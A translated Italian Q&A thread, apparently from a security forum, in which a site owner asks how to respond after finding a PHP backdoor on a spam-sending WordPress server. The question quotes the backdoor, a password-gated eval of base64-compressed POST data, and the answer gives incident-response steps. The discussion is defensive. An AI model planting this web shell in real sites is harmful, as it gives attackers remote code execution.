Backdoor PHP sul server live [duplicato]

Naviga le tue risposte
0

Improvvisamente uno dei nostri siti web Wordpress ha iniziato a inviare e-mail di spam ed è stato inserito nella lista nera su MXToolBox. Quindi con il supporto del server ho scansionato i file e trovato uno strano file chiamato timer.php contenente il seguente blocco di codice: 

 if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1")
     {echo "200"; exit;}
 if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="some code")
     eval(gzuncompress(base64_decode($_POST["chk"])));

Dopo alcune ricerche online ho scoperto che questo è dannoso e una backdoor. Quali sono le azioni raccomandate che dovrei prendere per mitigare questo? Cancellare il file sarebbe sufficiente?

    
posta mapmalith 02.01.2018 - 06:43
fonte

1 risposta

1

In breve No.

Per il commento di @ Alexander O'Mara devi trovare l'accesso.

I plugin di Wordpress sono noti per l'aggiunta di vulnerabilità: un buon inizio sarebbe controllare i tuoi plugin:

  1. Ottieni un elenco di cosa c'è
  2. Conferma che tutti gli elementi dovrebbero essere lì.
  3. Scopri perché sono necessari
  4. Verifica che i requisiti richiesti siano aggiornati
  5. Verifica le vulnerabilità note nelle ultime versioni di quelle
  6. Riconsiderare il requisito o cercare eventuali sostituzioni se disponibili.

Dovrai anche cercare altri potenziali accessi (wordpress è un buon candidato ma non l'unico) e backdoor che potrebbero aver lasciato (cioè modi per riottenere accesso come un nuovo utente o una shell inversa)

Se hai un backup, sarebbe meglio aggiornarlo e & ricostruire dal server di base. Cioè elimina la versione live attuale e amp; inizia dal backup o da una versione pulita.

Ci sono servizi che filtrano la tua posta in uscita, noi usiamo "Symantec Email Security.cloudmessage" questo può avvisarti se inizi a inviare posta discutibile e sembra funzionare per noi sono sicuro che ci sono dozzine di servizi simili

A seconda del tempo di budget, ecc. potresti prendere in considerazione l'idea di far fare a qualcuno questo per te - attenzione ci sono molte persone che possono usare Wordpress ma non hanno idea della sicurezza.

    
risposta data 02.01.2018 - 12:58
fonte

Leggi altre domande sui tag

Come posso disabilitare la registrazione per regole specifiche in pfsense Rischio quando si ha IP pubblico [duplicato]